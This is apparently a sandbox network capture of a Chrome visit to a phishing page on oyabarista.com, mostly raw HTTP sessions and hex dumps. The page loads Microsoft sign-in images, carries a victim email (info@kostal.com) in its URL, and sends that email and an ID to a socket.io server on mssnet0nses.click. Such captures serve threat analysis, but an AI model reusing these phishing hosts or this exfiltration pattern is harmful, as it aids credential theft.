                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:26 UTC612INHTTP/1.1 200 OK
                                                        Content-Type: image/svg+xml
                                                        Content-MD5: 1jQlecEJaGhFO2st5KXLhg==
                                                        Last-Modified: Thu, 05 Dec 2024 00:02:58 GMT
                                                        ETag: "0x8DD14C02D49A504"
                                                        x-ms-request-id: 03f49686-701e-00ad-6f9e-66cd12000000
                                                        x-ms-version: 2018-03-28
                                                        Access-Control-Expose-Headers: Accept-Ranges,Cache-Control,Content-Encoding,Content-Length,Content-MD5,Content-Type,Date,ETag,Last-Modified,Server,x-ms-request-id,x-ms-version
                                                        Access-Control-Allow-Origin: *
                                                        Cache-Control: public, max-age=25323747
                                                        Date: Thu, 27 Mar 2025 13:41:26 GMT
                                                        Content-Length: 1636
                                                        Connection: close
                                                        Akamai-GRN: 0.8904d217.1743082886.e04c5a6
                                                        2025-03-27 13:41:26 UTC1636INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 38 2c 31 34 48 31 30 56 33 34 48 33 38 56 31 34 6d 32 2c 32 32 48 38 56 31 32 48 34 30 56 33 36 4d 31 37 2e 36 38 38 2c 31 38 2e 38 56 32 38 2e 38 32 38 48 31 35 2e 35 33 31 56 32 31 2e 32 33 34 61 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 2e 36 37 32 2e 34 33 6c 2d 2e 32 36 36 2e 31 31 37 61
                                                        Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.54975423.209.72.314436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:26 UTC464OUTGET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1
                                                        Host: aadcdn.msftauth.net
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:27 UTC611INHTTP/1.1 200 OK
                                                        Content-Type: image/svg+xml
                                                        Content-MD5: 1jQlecEJaGhFO2st5KXLhg==
                                                        Last-Modified: Thu, 05 Dec 2024 00:02:58 GMT
                                                        ETag: "0x8DD14C02D49A504"
                                                        x-ms-request-id: 03f49686-701e-00ad-6f9e-66cd12000000
                                                        x-ms-version: 2018-03-28
                                                        Access-Control-Expose-Headers: Accept-Ranges,Cache-Control,Content-Encoding,Content-Length,Content-MD5,Content-Type,Date,ETag,Last-Modified,Server,x-ms-request-id,x-ms-version
                                                        Access-Control-Allow-Origin: *
                                                        Cache-Control: public, max-age=25323767
                                                        Date: Thu, 27 Mar 2025 13:41:27 GMT
                                                        Content-Length: 1636
                                                        Connection: close
                                                        Akamai-GRN: 0.9f04d217.1743082887.c0c125
                                                        2025-03-27 13:41:27 UTC1636INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 38 2c 31 34 48 31 30 56 33 34 48 33 38 56 31 34 6d 32 2c 32 32 48 38 56 31 32 48 34 30 56 33 36 4d 31 37 2e 36 38 38 2c 31 38 2e 38 56 32 38 2e 38 32 38 48 31 35 2e 35 33 31 56 32 31 2e 32 33 34 61 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 2e 36 37 32 2e 34 33 6c 2d 2e 32 36 36 2e 31 31 37 61
                                                        Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.549761104.21.70.2324436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:28 UTC727OUTGET /wp-includes/images/w-logo-blue-white-bg.png HTTP/1.1
                                                        Host: www.oyabarista.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:28 UTC876INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:41:28 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 4119
                                                        Connection: close
                                                        Last-Modified: Tue, 16 Nov 2021 00:04:01 GMT
                                                        Cache-Control: max-age=14400
                                                        CF-Cache-Status: REVALIDATED
                                                        Accept-Ranges: bytes
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zbxkUsvSYnfAHmNjZJnAMVTbfcKnJhj9G%2BrrqpVAkJpY78q48K5R0ZkIcyJjZ5KeyfZu4FMpwYwVkKKnYPmUyWpoLIcv1WEvXvUpi%2BuOhpYUjo9ajlOIASFP2HVNK%2B4KoDbVMIo%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4e331f3b7cae-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84246&min_rtt=83969&rtt_var=17977&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1299&delivery_rate=36387&cwnd=232&unsent_bytes=0&cid=e69b87eec9b97055&ts=1068&x=0"
                                                        2025-03-27 13:41:28 UTC493INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 50 00 00 00 50 08 06 00 00 00 8e 11 f2 ad 00 00 0f de 49 44 41 54 78 da e5 5d 09 78 55 c5 15 0e 5b c1 c8 56 10 d1 2a 29 9b 4b 6b ad c5 da 56 ad 6b b5 1b 4a 5d 6a 4b 45 6c 3f f5 ab b5 74 b7 04 12 21 09 7b 14 2c a0 a2 11 45 83 d9 13 b2 90 90 1d 92 40 c0 b0 84 b0 46 90 25 04 08 81 10 12 42 16 12 b2 4e e7 bf 79 93 cc 9d 77 97 b9 f7 bd 87 49 7b be 6f be f0 de 9b 3b cb b9 73 e6 9c f3 9f 33 83 97 d7 57 48 d7 cf 8b 1b ff ad a5 c9 2f d3 b2 7a 42 70 d2 96 6f 2c 58 57 f2 f5 80 98 9a 81 b3 23 5a bd 66 86 11 be 7c 6d 76 44 f3 d0 39 d1 17 46 06 c6 1c a2 cf a5 8d 08 8c 79 ab 9f 6f f8 b3 f4 b7 31 5e ff 37 34 33 6c d8 d8 c5 09 af de f9 76 ca e7 23 03 63 1b 45 26 f1 65 d8 dc 68 55 31 aa 7b 8d 7f e4 05 ca e0 08 fa ef
                                                        Data Ascii: PNGIHDRPPIDATx]xU[V*)KkVkJ]jKEl?t!{,E@F%BNywI{o;s3WH/zBpo,XW#Zf|mvD9Fyo1^743lv#cE&ehU1{
                                                        2025-03-27 13:41:28 UTC1369INData Raw: 4a b7 87 be 31 06 8e 91 15 f4 ef b4 1e c7 bb d7 53 0a 1f a3 8a a1 92 0d f4 b1 d5 d9 64 cf 99 6a c3 c9 5d 6e 69 25 19 5f 96 93 39 19 7b c9 4f 3f da 48 a8 06 36 54 14 7c 41 dd 47 43 b2 95 67 b3 8f 9c 55 18 6f 44 45 74 2c 3f f9 30 bb eb f9 81 7e 11 9b e9 df 71 3d 82 79 cf 7e b6 39 e4 5a ff a8 2e a5 80 15 63 b4 c2 c2 76 97 90 5f ae c9 c1 fe 24 cd 30 b3 32 c0 b1 b7 46 ee 39 61 c8 4c 8c 8d 29 1d aa 6c 2e d3 bf d3 bf 32 c6 8d 9e 17 77 ed 0f df 49 df cf 26 f1 a7 f8 1d a4 56 67 8f fb b2 b2 96 cc 48 dc 49 06 cf 89 72 1b d3 f4 0a d5 c0 e4 2f b4 af 92 aa 7a cd b1 60 8c 18 2b f7 cc 1a 5a 06 5e 55 e6 3d 1a 92 35 61 42 70 62 0d 06 30 3c 20 86 ac 2f 3e ad 39 d8 63 17 ea c8 ef 22 f2 49 1f df 30 8f 33 4e 2c 7d 7d c3 c9 d4 f0 7c 5d 46 62 8f c5 d8 51 b7 cf cc b0 1d f4 ef a8
                                                        Data Ascii: J1Sdj]ni%_9{O?H6T|AGCgUoDEt,?0~q=y~9Z.cv_$02F9aL)l.2wI&VgHIr/z`+Z^U=5aBpb0< />9c"I03N,}}|]FbQ
                                                        2025-03-27 13:41:28 UTC1369INData Raw: 18 45 34 51 78 82 d2 e4 eb ce cd 54 1b e2 08 97 3a 7e 7b c6 8b da 54 09 5a 76 12 f6 23 b1 d3 95 f9 87 af 8a 18 c3 93 f1 b4 18 cf 33 58 e9 a2 04 89 2b 96 53 94 41 5e 93 96 a7 ee c1 07 38 ed 3c 89 20 00 ca 3d 2b d3 ae 8a 18 8b f6 97 27 c4 d8 48 99 88 6d 22 17 47 07 a1 89 f4 9a 10 9c 78 16 1f 8e 5e a8 53 f9 81 7a 1d 1f 32 58 fa 3c 41 19 d8 65 20 36 70 59 d7 cb ae 18 5f e3 1f a9 d9 1e 5c 4a 2d 18 8e f7 d7 81 0a 39 be 2f f0 1a 15 14 d7 80 0f bc a6 01 7a a1 d7 b1 5f da 1e e9 d5 f1 a3 77 d3 6d 33 d1 28 49 49 0c 02 f1 49 95 56 0a 50 1c 91 36 1c 2a 33 5d 38 9c 92 39 e1 35 c8 2f a2 4d 7c 1b 7a 8d b0 f8 42 bb a4 6f f7 36 75 03 ed 32 f0 e9 b5 79 d2 2f 0a 16 82 9d 3e be a8 70 96 26 e4 f2 68 d5 e5 b3 1a 30 fd 3e 9d df d7 23 31 92 dc 30 7f 9d a6 07 a2 57 72 8e 9d 93 9a
                                                        Data Ascii: E4QxT:~{TZv#3X+SA^8< =+'Hm"Gx^Sz2X<Ae 6pY_\J-9/z_wm3(IIIVP6*3]895/M|zBo6u2y/>p&h0>#10Wr
                                                        2025-03-27 13:41:28 UTC888INData Raw: 39 49 c7 9f 0f 5b 4e b2 91 4b 63 35 ef 19 cc d4 3b dc 83 6b 54 44 c9 79 2d 61 07 bb 75 29 07 f7 e2 58 bd 48 67 dc c0 d9 11 cd 50 28 e2 b2 06 82 eb 63 60 06 20 36 61 25 1f d9 6e 6e f5 24 8b b1 13 2e a7 c5 29 23 0c 5b 8a 8e e8 22 73 63 bc ad 13 9b d4 a4 78 91 01 9a 38 75 c4 d3 91 ca 5a 65 bf d3 9b 1c 0c 62 59 42 4e a0 dd 00 3c e0 75 59 d2 b2 67 71 54 0c 98 a0 98 d7 43 fd fb 26 47 9d 97 5c 3a 33 4c 57 53 28 1a 42 8a bf 18 0b c6 69 26 3d 26 52 cd 25 3d b1 db 5c 38 3a 2b ee 5b 46 38 a1 98 75 00 e6 89 de 06 fc ff b1 8b 13 2f 39 21 2e 2e dc 89 35 90 da 86 4a 0a dc 33 6b 9d ef 4b 80 7b a4 27 ce e2 e0 b4 88 cb 74 b2 55 90 7a 26 03 e8 8a 48 35 14 a4 e8 7a 62 4f 7e f0 fd cc 3a 47 9d 42 5a 06 b9 eb 62 b1 51 94 89 b8 cd 82 bc 18 bd cd c9 17 85 36 c4 8a b3 e3 f8 cf 4e
                                                        Data Ascii: 9I[NKc5;kTDy-au)XHgP(c` 6a%nn$.)#["scx8uZebYBN<uYgqTC&G\:3LWS(Bi&=&R%=\8:+[F8u/9!..5J3kK{'tUz&H5zbO~:GBZbQ6N


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.549763172.67.168.1894436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:28 UTC425OUTGET /wp-includes/images/w-logo-blue-white-bg.png HTTP/1.1
                                                        Host: www.oyabarista.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:29 UTC330INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:41:29 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 4119
                                                        Connection: close
                                                        Server: cloudflare
                                                        Accept-Ranges: bytes
                                                        Last-Modified: Tue, 16 Nov 2021 00:04:01 GMT
                                                        Cache-Control: max-age=14400
                                                        Cf-Cache-Status: HIT
                                                        Age: 1
                                                        CF-RAY: 926f4e392953659d-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-27 13:41:29 UTC1039INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 50 00 00 00 50 08 06 00 00 00 8e 11 f2 ad 00 00 0f de 49 44 41 54 78 da e5 5d 09 78 55 c5 15 0e 5b c1 c8 56 10 d1 2a 29 9b 4b 6b ad c5 da 56 ad 6b b5 1b 4a 5d 6a 4b 45 6c 3f f5 ab b5 74 b7 04 12 21 09 7b 14 2c a0 a2 11 45 83 d9 13 b2 90 90 1d 92 40 c0 b0 84 b0 46 90 25 04 08 81 10 12 42 16 12 b2 4e e7 bf 79 93 cc 9d 77 97 b9 f7 bd 87 49 7b be 6f be f0 de 9b 3b cb b9 73 e6 9c f3 9f 33 83 97 d7 57 48 d7 cf 8b 1b ff ad a5 c9 2f d3 b2 7a 42 70 d2 96 6f 2c 58 57 f2 f5 80 98 9a 81 b3 23 5a bd 66 86 11 be 7c 6d 76 44 f3 d0 39 d1 17 46 06 c6 1c a2 cf a5 8d 08 8c 79 ab 9f 6f f8 b3 f4 b7 31 5e ff 37 34 33 6c d8 d8 c5 09 af de f9 76 ca e7 23 03 63 1b 45 26 f1 65 d8 dc 68 55 31 aa 7b 8d 7f e4 05 ca e0 08 fa ef
                                                        Data Ascii: PNGIHDRPPIDATx]xU[V*)KkVkJ]jKEl?t!{,E@F%BNywI{o;s3WH/zBpo,XW#Zf|mvD9Fyo1^743lv#cE&ehU1{
                                                        2025-03-27 13:41:29 UTC1369INData Raw: 0f e2 29 4a 8f 1e 41 aa 86 77 43 68 f6 8c ed 45 9b 0e 4c 61 1e 46 ea a1 33 aa 0e aa 2e 5f 21 b7 be b5 be d7 30 0f 1a b8 ee 8a 35 20 23 b9 b8 8c 29 95 7a cb 6e 5f 50 d6 be be 77 af 48 55 0c 65 58 f5 e2 66 cb fb 95 bd a1 2c cd 2b b6 85 ec 70 1e 4b b6 35 ad bb 36 6f 39 db 6c 45 f4 63 56 6a 51 af 62 1e 0a 5c 49 3b 84 55 3b a6 7b 9b 92 43 71 ee 5a be 61 f8 c8 c0 58 05 04 4d 3b ac 16 5d 40 4a 66 6e 19 2c ff d1 f3 e3 14 11 87 5f aa 55 a7 1f f5 50 60 6c 0f 35 81 ea cd 0a 5c 31 99 7d f8 4a 6b 9b 6d 7c 11 6e aa a3 9d 33 52 78 e2 e3 ab b3 93 f0 00 10 13 91 0e 9d bf a4 30 91 15 68 34 40 ec d8 74 2b ea 9a 14 88 8a a7 33 97 2e 93 21 73 a2 9d 98 b7 ff ec 45 55 bd 9a c6 66 52 46 eb 42 ab a3 bd ad 27 ce 2b 5e 03 fc d5 ac 23 e5 4a 5f c0 f6 f0 1c 94 57 35 dd 83 db 39 dc 3f
                                                        Data Ascii: )JAwChELaF3._!05 #)zn_PwHUeXf,+pK56o9lEcVjQb\I;U;{CqZaXM;]@Jfn,_UP`l5\1}Jkm|n3Rx0h4@t+3.!sEUfRFB'+^#J_W59?
                                                        2025-03-27 13:41:29 UTC1369INData Raw: d6 66 e2 cb f6 e2 7f 24 ef 92 3e 67 22 93 fd ff bd e5 a9 96 24 04 89 02 3a 3a 22 ca 8b 6e a6 61 5a 60 02 03 53 cd 0a 02 e1 ee 14 63 5e 7c a7 45 6e ed 8a 25 cb 46 ed 90 3d 6b d6 87 e8 4d 99 99 5a 38 f7 c2 d3 9b b9 c5 ec b7 79 5e 0f ac ca 98 81 0f 2f c5 aa 6d 3b 74 22 33 e1 d7 53 76 bb 55 8c 99 f8 62 4f e6 7d 52 31 43 cc 15 31 e6 63 3c c8 74 30 ab ef 9f be 47 f4 56 da bb e0 2c ba e4 7d f0 e1 f6 a5 c9 aa 4a 00 11 65 18 08 51 17 53 7e ed 8a 31 2f be 40 c0 ed 44 ed cc c4 18 40 05 3f 5e 19 d4 48 04 54 e9 9c 2f 3b 7e f3 51 50 e9 e1 01 31 75 e2 c6 0a 43 79 80 a4 59 20 03 91 cb 88 31 2f be a2 28 0e a4 4c 91 8d da 19 89 f1 0b 51 5b 55 75 ef 5a be c1 70 4c e8 97 cf 50 2b ef 4e 23 29 eb 8a 89 8c 5d 9c 90 81 2f c3 8b 4a 6c 61 6d cf 47 e6 bb 25 1c c9 c4 17 1a 4f 6b 15
                                                        Data Ascii: f$>g"$::"naZ`Sc^|En%F=kMZ8y^/m;t"3SvUbO}R1C1c<t0GV,}JeQS~1/@D@?^HT/;~QP1uCyY 1/(LQ[UuZpLP+N#)]/JlamG%Ok
                                                        2025-03-27 13:41:29 UTC342INData Raw: 71 1c 5d 8d 1b f9 fc 66 ad fc 63 9e b0 5a b1 0a 71 5e 03 47 4b 71 43 88 ec bd 80 b0 3b 11 6e 5c b8 f1 80 b2 7d 98 ad 7c e0 79 0f bc 9f 59 cf b5 93 d3 63 ae 00 15 18 39 cd 71 fb 99 92 84 0d 2c 4e 0c 0f 98 81 0b b8 d2 18 a7 c3 91 87 8d a4 46 94 dc e3 e7 14 8d 0d e8 ab c5 c2 c9 73 80 bb 93 d7 e4 f0 17 7e 97 2b a8 8a 65 60 e0 ea 32 d1 1b b7 5b 50 06 32 10 52 09 54 21 da a7 a5 09 dd 4d d8 e3 10 62 bd 67 65 1a 7f 9d 3c 5c b3 39 d2 78 5e 0f 61 e4 50 5c d0 d0 07 29 10 5d f6 5a 64 07 1c 7a 64 40 c8 9e bb 93 21 a0 43 30 63 a8 58 37 22 be cd 31 ee 8c 12 c3 10 63 b8 bd ec 2a f8 7e 8e 6b d9 e3 1d 27 bd 55 41 28 64 85 01 d7 83 3b 06 b3 c7 68 95 c2 70 c7 2d 1f 30 d6 91 bc 0e 8f 88 ee 87 cd c2 3e d9 ac 1c c9 ef ed 57 c1 eb 30 73 88 e3 3f 0c 58 eb b8 fd 42 3b a1 67 76 44
                                                        Data Ascii: q]fcZq^GKqC;n\}|yYc9q,NFs~+e`2[P2RT!Mbge<\9x^aP\)]Zdzd@!C0cX7"1c*~k'UA(d;hp-0>W0s?XB;gvD


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.549764172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:40 UTC567OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNraPW HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: GET
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:40 UTC375INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:41:40 GMT
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        Cf-Cache-Status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 926f4e807dda438b-EWR
                                                        alt-svc: h3=":443"; ma=86400


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.2.549765172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:40 UTC667OUTGET /socket.io/?EIO=4&transport=polling&t=PNNraPW HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:41 UTC851INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:41:41 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 118
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M2DgNLenMvYLtTg3wgQbx9HjBLRDEdXkGza3cLHlSfyRX%2Fy04YB0hS%2FWBr0v%2Bnz%2FpUpME6UweyQt8NH2w%2Frjbc0G41la7qk5pmM9QkcQ6iCNceCDYxyy94xN38ttWACdiJSQBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4e838b9e0c88-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84403&min_rtt=83166&rtt_var=18822&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1239&delivery_rate=36738&cwnd=242&unsent_bytes=0&cid=75204177d4b59c65&ts=307&x=0"
                                                        2025-03-27 13:41:41 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 33 4b 49 66 66 72 47 63 69 47 6b 75 39 4c 63 46 41 41 65 30 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                        Data Ascii: 0{"sid":"3KIffrGciGku9LcFAAe0","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.2.549767172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:41 UTC566OUTGET /socket.io/?EIO=4&transport=websocket&sid=3KIffrGciGku9LcFAAe0 HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: Upgrade
                                                        Pragma: no-cache
                                                        Cache-Control: no-cache
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Upgrade: websocket
                                                        Origin: https://www.oyabarista.com
                                                        Sec-WebSocket-Version: 13
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Sec-WebSocket-Key: ZtPFtoZ2x84UMtBW0Hft2g==
                                                        Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                        2025-03-27 13:41:41 UTC833INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:41:41 GMT
                                                        Content-Type: application/json
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DAA8Fzqxm75RDmQMD6ib0Sv%2BRaCfznaur6MYfyXTGvSifRwHJtF7mAPSV5%2FhKyPS28%2F7x%2BP9yLOGNf3gKNL2fDAzIcKLK5B9JY5lKi4NSNiF06SQD2X%2BJJyyvMa121h19LtF0g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4e86cd714205-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84809&min_rtt=83479&rtt_var=18969&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1121&delivery_rate=36589&cwnd=252&unsent_bytes=0&cid=87d67243953d9aa8&ts=314&x=0"
                                                        2025-03-27 13:41:41 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                        Data Ascii: 22{"code":3,"message":"Bad request"}
                                                        2025-03-27 13:41:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.2.549766172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:41 UTC593OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNrail&sid=3KIffrGciGku9LcFAAe0 HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: POST
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
